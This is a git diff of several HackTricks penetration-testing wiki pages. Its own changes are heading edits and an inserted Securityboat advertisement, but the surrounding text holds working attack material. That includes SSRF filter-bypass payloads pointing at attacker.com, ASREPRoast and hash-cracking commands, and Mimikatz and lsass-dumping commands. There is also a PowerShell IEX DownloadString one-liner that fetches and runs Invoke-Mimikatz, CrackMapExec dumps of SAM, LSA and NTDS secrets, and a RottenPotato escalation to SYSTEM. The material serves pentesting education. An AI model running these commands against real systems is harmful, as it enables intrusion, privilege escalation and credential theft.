+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ -## Localhost +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} + +### Localhost ```bash # Localhost @@ -85,7 +91,7 @@ spoofed.burpcollaborator.net = 127.0.0.1 ![](<../../.gitbook/assets/image (649) (1) (1).png>) -## Domain Parser +### Domain Parser ```bash https:attacker.com @@ -115,7 +121,7 @@ attacker。com ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿ ``` -## Domain Confusion +### Domain Confusion ```bash # Try also to change attacker.com for 127.0.0.1 to try to access localhost @@ -160,7 +166,7 @@ http://1.1.1.1 &@2.2.2.2# @3.3.3.3/ next={domain}&next=attacker.com ``` -## Paths and Extensions Bypass +### Paths and Extensions Bypass If you are required that the URL must end in a path or an extension, or must contain a path you can try one of the following bypasses: @@ -170,7 +176,7 @@ https://metadata/vulerable/path#.extension https://metadata/expected/path/..%2f..%2f/vulnerable/path ``` -## Bypass via redirect +### Bypass via redirect It might be possible that the server is **filtering the original request** of a SSRF **but not** a possible **redirect** response to that request.\ For example, a server vulnerable to SSRF via: `url=https://www.google.com/` might be **filtering the url param**. But if you uses a [python server to respond with a 302](https://pastebin.com/raw/ywAUhFrv) to the place where you want to redirect, you might be able to **access filtered IP addresses** like 127.0.0.1 or even filtered **protocols** like gopher.\ @@ -197,9 +203,9 @@ class Redirect(BaseHTTPRequestHandler): HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever() ``` -# Explained Tricks +## Explained Tricks -## Blackslash-trick +### Blackslash-trick In short, the _backslash-trick_ relies on exploiting a minor difference between two “URL” specifications: the [WHATWG URL Standard](https://url.spec.whatwg.org/#url-parsing), and [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#appendix-B). RFC3986 is a generic, multi-purpose specification for the syntax of _Uniform Resource Identifiers_, while the WHATWG URL Standard is specifically aimed at the Web, and at URLs (which are a subset of URIs). Modern browsers implement the WHATWG URL Standard. @@ -207,12 +213,18 @@ Both of them describe a way of parsing URI/URLs, with one slight difference. The ![The two specifications parsing the same URL differently](https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg) -## Other Confusions +### Other Confusions ![](<../../.gitbook/assets/image (629).png>) image from [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/) +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %}
@@ -229,5 +241,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md b/pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md index c061d11e..cfb94abd 100644 --- a/pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md +++ b/pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md @@ -16,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} + Kubernetes uses several **specific network services** that you might find **exposed to the Internet** or in an **internal network once you have compromised one pod**. ## Finding exposed pods with OSINT @@ -223,6 +230,13 @@ For example, a remote attacker can abuse this by accessing the following URL: `h {% embed url="https://labs.f-secure.com/blog/attacking-kubernetes-through-kubelet" %} +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} +
Support HackTricks and get benefits! diff --git a/reversing/reversing-tools-basic-methods/README.md b/reversing/reversing-tools-basic-methods/README.md index 754c657f..6f946dcd 100644 --- a/reversing/reversing-tools-basic-methods/README.md +++ b/reversing/reversing-tools-basic-methods/README.md @@ -1,7 +1,5 @@ # Reversing Tools & Basic Methods -## Reversing Tools & Basic Methods -
Support HackTricks and get benefits! @@ -18,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} + ## Wasm decompiler / Wat compiler Online: @@ -398,6 +403,13 @@ So, in this challenge, knowing the values of the buttons, you needed to **press * [https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering](https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering) * [https://github.com/malrev/ABD](https://github.com/malrev/ABD) (Binary deobfuscation) +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} +
Support HackTricks and get benefits! diff --git a/windows-hardening/active-directory-methodology/asreproast.md b/windows-hardening/active-directory-methodology/asreproast.md index 445bc090..aefee360 100644 --- a/windows-hardening/active-directory-methodology/asreproast.md +++ b/windows-hardening/active-directory-methodology/asreproast.md @@ -1,4 +1,4 @@ - +# ASREPRoast
@@ -16,8 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ -# ASREPRoast +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} + +## ASREPRoast The ASREPRoast attack looks for **users without Kerberos pre-authentication required attribute (**[_**DONT\_REQ\_PREAUTH**_](https://support.microsoft.com/en-us/help/305144/how-to-use-the-useraccountcontrol-flags-to-manipulate-user-account-pro)_**)**_. @@ -25,13 +31,13 @@ That means that anyone can send an AS\_REQ request to the DC on behalf of any of Furthermore, **no domain account is needed to perform this attack**, only connection to the DC. However, **with a domain account**, a LDAP query can be used to **retrieve users without Kerberos pre-authentication** in the domain. **Otherwise usernames have to be guessed**. -### Enumerating vulnerable users (need domain credentials) +#### Enumerating vulnerable users (need domain credentials) ```bash Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView ``` -### Request AS\_REP message +#### Request AS\_REP message {% code title="Using Linux" %} ```bash @@ -49,14 +55,14 @@ Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github ``` {% endcode %} -## Cracking +### Cracking ``` john --wordlist=passwords_kerb.txt hashes.asreproast hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt ``` -## Persistence +### Persistence Force **preauth** not required for a user where you have **GenericAll** permissions (or permissions to write properties): @@ -66,6 +72,12 @@ Set-DomainObject -Identity -XOR @{useraccountcontrol=4194304} -Verbos [**More information about AS-RRP Roasting in ired.team**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat) +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %}
@@ -82,5 +94,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/windows-hardening/active-directory-methodology/kerberos-authentication.md b/windows-hardening/active-directory-methodology/kerberos-authentication.md index 2e24f5cc..3bd03fd0 100644 --- a/windows-hardening/active-directory-methodology/kerberos-authentication.md +++ b/windows-hardening/active-directory-methodology/kerberos-authentication.md @@ -1,4 +1,4 @@ - +# Kerberos Authentication
@@ -16,10 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} **This information was extracted from the post:** [**https://www.tarlogic.com/en/blog/how-kerberos-works/**](https://www.tarlogic.com/en/blog/how-kerberos-works/) -# Kerberos (I): How does Kerberos work? – Theory +## Kerberos (I): How does Kerberos work? – Theory 20 - MAR - 2019 - ELOY PÉREZ @@ -31,13 +37,13 @@ In this first post only basic functionality will be discussed. In later posts it If you have any doubt about the topic which it is not well explained, do not be afraid on leave a comment or question about it. Now, onto the topic. -## What is Kerberos? +### What is Kerberos? Firstly, Kerberos is an authentication protocol, not authorization. In other words, it allows to identify each user, who provides a secret password, however, it does not validates to which resources or services can this user access. Kerberos is used in Active Directory. In this platform, Kerberos provides information about the privileges of each user, but it is responsability of each service to determine if the user has access to its resources. -## Kerberos items +### Kerberos items In this section several components of Kerberos environment will be studied. @@ -98,7 +104,7 @@ Below is shown a summary of message sequency to perform authentication ![Kerberos messages summary](<../../.gitbook/assets/image (174).png>) -## Authentication process +### Authentication process In this section, the sequency of messages to perform authentication will be studied, starting from a user without tickets, up to being authenticated against the desired service. @@ -115,7 +121,7 @@ _KRB\_AS\_REQ_ has, among others, the following fields: * The service **SPN** asociated with **krbtgt** account * A **Nonce** generated by the user -Note: the encrypted timestamp is only necessary if user requires preauthentication, which is common, except if [_DONT\_REQ\_PREAUTH_](https://support.microsoft.com/en-us/help/305144/how-to-use-the-useraccountcontrol-flags-to-manipulate-user-account-pro) __ flag is set in user account. +Note: the encrypted timestamp is only necessary if user requires preauthentication, which is common, except if [_DONT\_REQ\_PREAUTH_](https://support.microsoft.com/en-us/help/305144/how-to-use-the-useraccountcontrol-flags-to-manipulate-user-account-pro) \_\_ flag is set in user account. **KRB\_AS\_REP** @@ -187,7 +193,7 @@ _KRB\_AP\_REQ_ includes: After that, if user privileges are rigth, this can access to service. If is the case, which not usually happens, the AP will verify the PAC against the KDC. And also, if mutual authentication is needed it will respond to user with a _KRB\_AP\_REP_ message. -## References +### References * Kerberos v5 RFC: [https://tools.ietf.org/html/rfc4120](https://tools.ietf.org/html/rfc4120) * \[MS-KILE] – Kerberos extension: [https://msdn.microsoft.com/en-us/library/cc233855.aspx](https://msdn.microsoft.com/en-us/library/cc233855.aspx) @@ -195,7 +201,7 @@ After that, if user privileges are rigth, this can access to service. If is the * Mimikatz and Active Directory Kerberos Attacks: [https://adsecurity.org/?p=556](https://adsecurity.org/?p=556) * Explain like I’m 5: Kerberos: [https://www.roguelynn.com/words/explain-like-im-5-kerberos/](https://www.roguelynn.com/words/explain-like-im-5-kerberos/) * Kerberos & KRBTGT: [https://adsecurity.org/?p=483](https://adsecurity.org/?p=483) -* Mastering Windows Network Forensics and Investigation, 2 Edition . Autores: S. Anson , S. Bunting, R. Johnson y S. Pearson. Editorial Sibex. +* Mastering Windows Network Forensics and Investigation, 2 Edition . Autores: S. Anson , S. Bunting, R. Johnson y S. Pearson. Editorial Sibex. * Active Directory , 5 Edition. Autores: B. Desmond, J. Richards, R. Allen y A.G. Lowe-Norris * Service Principal Names: [https://msdn.microsoft.com/en-us/library/ms677949(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/ms677949\(v=vs.85\).aspx) * Niveles funcionales de Active Directory: [https://technet.microsoft.com/en-us/library/dbf0cdec-d72f-4ba3-bc7a-46410e02abb0](https://technet.microsoft.com/en-us/library/dbf0cdec-d72f-4ba3-bc7a-46410e02abb0) @@ -213,6 +219,12 @@ After that, if user privileges are rigth, this can access to service. If is the * Mitigating Pass-the-Hash (PtH) Attacks and Other Credential Theft: [https://www.microsoft.com/en-us/download/details.aspx?id=36036](https://www.microsoft.com/en-us/download/details.aspx?id=36036) * Fun with LDAP, Kerberos (and MSRPC) in AD Environments: [https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments?slide=58](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments?slide=58) +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %}
@@ -229,5 +241,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/windows-hardening/ntlm/smbexec.md b/windows-hardening/ntlm/smbexec.md index e32c2102..8fd1cda7 100644 --- a/windows-hardening/ntlm/smbexec.md +++ b/windows-hardening/ntlm/smbexec.md @@ -1,4 +1,4 @@ - +# SmbExec/ScExec
@@ -16,12 +16,18 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ -# How does it works +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} -**Smbexec works like Psexec.** In this example**,** **instead** of pointing the "_binpath_" to a malicious executable inside the victim, we are going to **point it** to **cmd.exe or powershell.exe** and one of they will download and execute the backdoor. +## How does it works -# **SMBExec** +**Smbexec works like Psexec.** In this example\*\*,\*\* **instead** of pointing the "_binpath_" to a malicious executable inside the victim, we are going to **point it** to **cmd.exe or powershell.exe** and one of they will download and execute the backdoor. + +## **SMBExec** Let's see what happens when smbexec runs by looking at it from the attackers and target's side: @@ -33,7 +39,7 @@ So we know it creates a service "BTOBTO". But that service isn't present on the The Service File Name contains a command string to execute (%COMSPEC% points to the absolute path of cmd.exe). It echoes the command to be executed to a bat file, redirects the stdout and stderr to a Temp file, then executes the bat file and deletes it. Back on Kali, the Python script then pulls the output file via SMB and displays the contents in our "pseudo-shell". For every command we type into our "shell", a new service is created and the process is repeated. This is why it doesn't need to drop a binary, it just executes each desired command as a new service. Definitely more stealthy, but as we saw, an event log is created for every command executed. Still a very clever way to get a non-interactive "shell"! -# Manual SMBExec +## Manual SMBExec **Or executing commands via services** @@ -55,10 +61,14 @@ And then start it: It errors out because our service doesn't respond, but if we look at our Metasploit listener we see that the callback was made and the payload executed. - - All the info was extracted from here: [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/) +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %}
@@ -75,5 +85,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/windows-hardening/stealing-credentials/README.md b/windows-hardening/stealing-credentials/README.md index 005323da..c2a6406c 100644 --- a/windows-hardening/stealing-credentials/README.md +++ b/windows-hardening/stealing-credentials/README.md @@ -1,4 +1,4 @@ - +# Stealing Credentials
@@ -16,8 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ -# Credentials Mimikatz +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} + +## Credentials Mimikatz ```bash #Elevate Privileges to extract the credentials @@ -33,7 +39,7 @@ mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump **Find other things that Mimikatz can do in** [**this page**](credentials-mimikatz.md)**.** -## Invoke-Mimikatz +### Invoke-Mimikatz ```bash IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1') @@ -43,7 +49,7 @@ Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpa [**Learn about some possible credentials protections here.**](credentials-protections.md) **This protections could prevent Mimikatz from extracting some credentials.** -# Credentials with Meterpreter +## Credentials with Meterpreter Use the [**Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials) **that** I have created to **search for passwords and hashes** inside the victim. @@ -63,11 +69,11 @@ mimikatz_command -f "sekurlsa::logonpasswords" mimikatz_command -f "lsadump::sam" ``` -# Bypassing AV +## Bypassing AV -## Procdump + Mimikatz +### Procdump + Mimikatz -As **Procdump from** [**SysInternals** ](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite)**is a legitimate Microsoft tool**, it's not detected by Defender. \ +As **Procdump from** [**SysInternals** ](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite)**is a legitimate Microsoft tool**, it's not detected by Defender.\ You can use this tool to **dump the lsass process**, **download the dump** and **extract** the **credentials locally** from the dump. {% code title="Dump lsass" %} @@ -93,7 +99,7 @@ This process is done automatically with [SprayKatz](https://github.com/aas-n/spr **Note**: Some **AV** may **detect** as **malicious** the use of **procdump.exe to dump lsass.exe**, this is because they are **detecting** the string **"procdump.exe" and "lsass.exe"**. So it is **stealthier** to **pass** as an **argument** the **PID** of lsass.exe to procdump **instead o**f the **name lsass.exe.** -## Dumping lsass with **comsvcs.dll** +### Dumping lsass with **comsvcs.dll** There’s a DLL called **comsvcs.dll**, located in `C:\Windows\System32` that **dumps process memory** whenever they **crash**. This DLL contains a **function** called **`MiniDumpW`** that is written so it can be called with `rundll32.exe`.\ The first two arguments are not used, but the third one is split into 3 parts. First part is the process ID that will be dumped, second part is the dump file location, and third part is the word **full**. There is no other choice.\ @@ -108,44 +114,44 @@ We just have to keep in mind that this technique can only be executed as **SYSTE **You can automate this process with** [**lssasy**](https://github.com/Hackndo/lsassy)**.** -# CrackMapExec +## CrackMapExec -## Dump SAM hashes +### Dump SAM hashes ``` cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam ``` -## Dump LSA secrets +### Dump LSA secrets ``` cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa ``` -## Dump the NTDS.dit from target DC +### Dump the NTDS.dit from target DC ``` cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds #~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss ``` -## Dump the NTDS.dit password history from target DC +### Dump the NTDS.dit password history from target DC ``` #~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-history ``` -## Show the pwdLastSet attribute for each NTDS.dit account +### Show the pwdLastSet attribute for each NTDS.dit account ``` #~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-pwdLastSet ``` -# Stealing SAM & SYSTEM +## Stealing SAM & SYSTEM This files should be **located** in _C:\windows\system32\config\SAM_ and _C:\windows\system32\config\SYSTEM._ But **you cannot just copy them in a regular way** because they protected. -## From Registry +### From Registry The easiest way to steal those files is to get a copy from the registry: @@ -162,11 +168,11 @@ samdump2 SYSTEM SAM impacket-secretsdump -sam sam -security security -system system LOCAL ``` -## Volume Shadow Copy +### Volume Shadow Copy You can perform copy of protected files using this service. You need to be Administrator. -### Using vssadmin +#### Using vssadmin vssadmin binary is only available in Windows Server versions @@ -196,7 +202,7 @@ $voume.Delete();if($notrunning -eq 1){$service.Stop()} Code from the book: [https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html](https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html) -## Invoke-NinjaCopy +### Invoke-NinjaCopy Finally, you could also use the [**PS script Invoke-NinjaCopy**](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1) to make a copy of SAM, SYSTEM and ntds.dit. @@ -204,12 +210,12 @@ Finally, you could also use the [**PS script Invoke-NinjaCopy**](https://github. Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\sam" -LocalDestination "c:\copy_of_local_sam" ``` -# **Active Directory Credentials - NTDS.dit** +## **Active Directory Credentials - NTDS.dit** **The Ntds.dit file is a database that stores Active Directory data**, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain. The important NTDS.dit file will be **located in**: _%SystemRoom%/NTDS/ntds.dit_\ -__This file is a database _Extensible Storage Engine_ (ESE) and is "officially" composed by 3 tables: +\_\_This file is a database _Extensible Storage Engine_ (ESE) and is "officially" composed by 3 tables: * **Data Table**: Contains the information about the objects (users, groups...) * **Link Table**: Information about the relations (member of...) @@ -217,9 +223,9 @@ __This file is a database _Extensible Storage Engine_ (ESE) and is "officially" More information about this: [http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/](http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/) -Windows uses _Ntdsa.dll_ to interact with that file and its used by _lsass.exe_. Then, **part** of the **NTDS.dit** file could be located **inside the **_**lsass**_** memory** (you can find the lastet accessed data probably because of the performance impruve by using a **cache**). +Windows uses _Ntdsa.dll_ to interact with that file and its used by _lsass.exe_. Then, **part** of the **NTDS.dit** file could be located **inside the \_lsass**\_\*\* memory\*\* (you can find the lastet accessed data probably because of the performance impruve by using a **cache**). -### Decrypting the hashes inside NTDS.dit +#### Decrypting the hashes inside NTDS.dit The hash is cyphered 3 times: @@ -229,7 +235,7 @@ The hash is cyphered 3 times: **PEK** have the **same value** in **every domain controller**, but it is **cyphered** inside the **NTDS.dit** file using the **BOOTKEY** of the **SYSTEM file of the domain controller (is different between domain controllers)**. This is why to get the credentials from the NTDS.dit file **you need the files NTDS.dit and SYSTEM** (_C:\Windows\System32\config\SYSTEM_). -## Copying NTDS.dit using Ntdsutil +### Copying NTDS.dit using Ntdsutil Available since Windows Server 2008. @@ -239,7 +245,7 @@ ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit You could also use the [**volume shadow copy**](./#stealing-sam-and-system) trick to copy the **ntds.dit** file. Remember that you will also need a copy of the **SYSTEM file** (again, [**dump it from the registry or use the volume shadow copy**](./#stealing-sam-and-system) trick). -## **Extracting hashes from NTDS.dit** +### **Extracting hashes from NTDS.dit** Once you have **obtained** the files **NTDS.dit** and **SYSTEM** you can use tools like _secretsdump.py_ to **extract the hashes**: @@ -257,7 +263,7 @@ For **big NTDS.dit files** it's recommend to extract it using [gosecretsdump](ht Finally, you can also use the **metasploit module**: _post/windows/gather/credentials/domain\_hashdump_ or **mimikatz** `lsadump::lsa /inject` -# Lazagne +## Lazagne Download the binary from [here](https://github.com/AlessandroZ/LaZagne/releases). you can use this binary to extract credentials from several software. @@ -265,13 +271,13 @@ Download the binary from [here](https://github.com/AlessandroZ/LaZagne/releases) lazagne.exe all ``` -# Other tools for extracting credentials from SAM and LSASS +## Other tools for extracting credentials from SAM and LSASS -## Windows credentials Editor (WCE) +### Windows credentials Editor (WCE) This tool can be used to extract credentials from the memory. Download it from: [http://www.ampliasecurity.com/research/windows-credentials-editor/](https://www.ampliasecurity.com/research/windows-credentials-editor/) -## fgdump +### fgdump Extract credentials from the SAM file @@ -280,7 +286,7 @@ You can find this binary inside Kali, just do: locate fgdump.exe fgdump.exe ``` -## PwDump +### PwDump Extract credentials from the SAM file @@ -290,14 +296,20 @@ PwDump.exe -o outpwdump -x 127.0.0.1 type outpwdump ``` -## PwDump7 +### PwDump7 Download it from:[ http://www.tarasco.org/security/pwdump\_7](http://www.tarasco.org/security/pwdump\_7) and just **execute it** and the passwords will be extracted. -# Defenses +## Defenses [**Learn about some credentials protections here.**](credentials-protections.md) +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %}
@@ -314,5 +326,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/windows-hardening/windows-local-privilege-escalation/rottenpotato.md b/windows-hardening/windows-local-privilege-escalation/rottenpotato.md index c3038b04..ef5a47ee 100644 --- a/windows-hardening/windows-local-privilege-escalation/rottenpotato.md +++ b/windows-hardening/windows-local-privilege-escalation/rottenpotato.md @@ -1,4 +1,4 @@ - +# RottenPotato
@@ -16,10 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} The info in this page info was extracted [from this post](https://www.absolomb.com/2018-05-04-HackTheBox-Tally/) -Service accounts usually have special privileges \(SeImpersonatePrivileges\) and this could be used to escalate privileges. +Service accounts usually have special privileges (SeImpersonatePrivileges) and this could be used to escalate privileges. [https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/) @@ -27,7 +33,7 @@ I won’t go into the details on how this exploit works, the article above expla Let’s check our privileges with meterpreter: -```text +``` meterpreter > getprivs Enabled Process Privileges @@ -47,7 +53,7 @@ Excellent, it looks like we have the privileges we need to perform the attack. L Back on our meterpreter session we load the `incognito` extension. -```text +``` meterpreter > use incognito Loading extension incognito...Success. meterpreter > list_tokens -u @@ -67,7 +73,7 @@ No tokens available We can see we currently have no Impersonation Tokens. Let’s run the Rotten Potato exploit. -```text +``` meterpreter > execute -f rottenpotato.exe -Hc Process 3104 created. Channel 2 created. @@ -88,7 +94,7 @@ NT AUTHORITY\SYSTEM We need to quickly impersonate the token or it will disappear. -```text +``` meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM" [-] Warning: Not currently running as SYSTEM, not all tokens will beavailable Call rev2self if primary process token is SYSTEM @@ -100,7 +106,12 @@ Server username: NT AUTHORITY\SYSTEM Success! We have our SYSTEM shell and can grab the root.txt file! +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %}
@@ -117,5 +128,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- -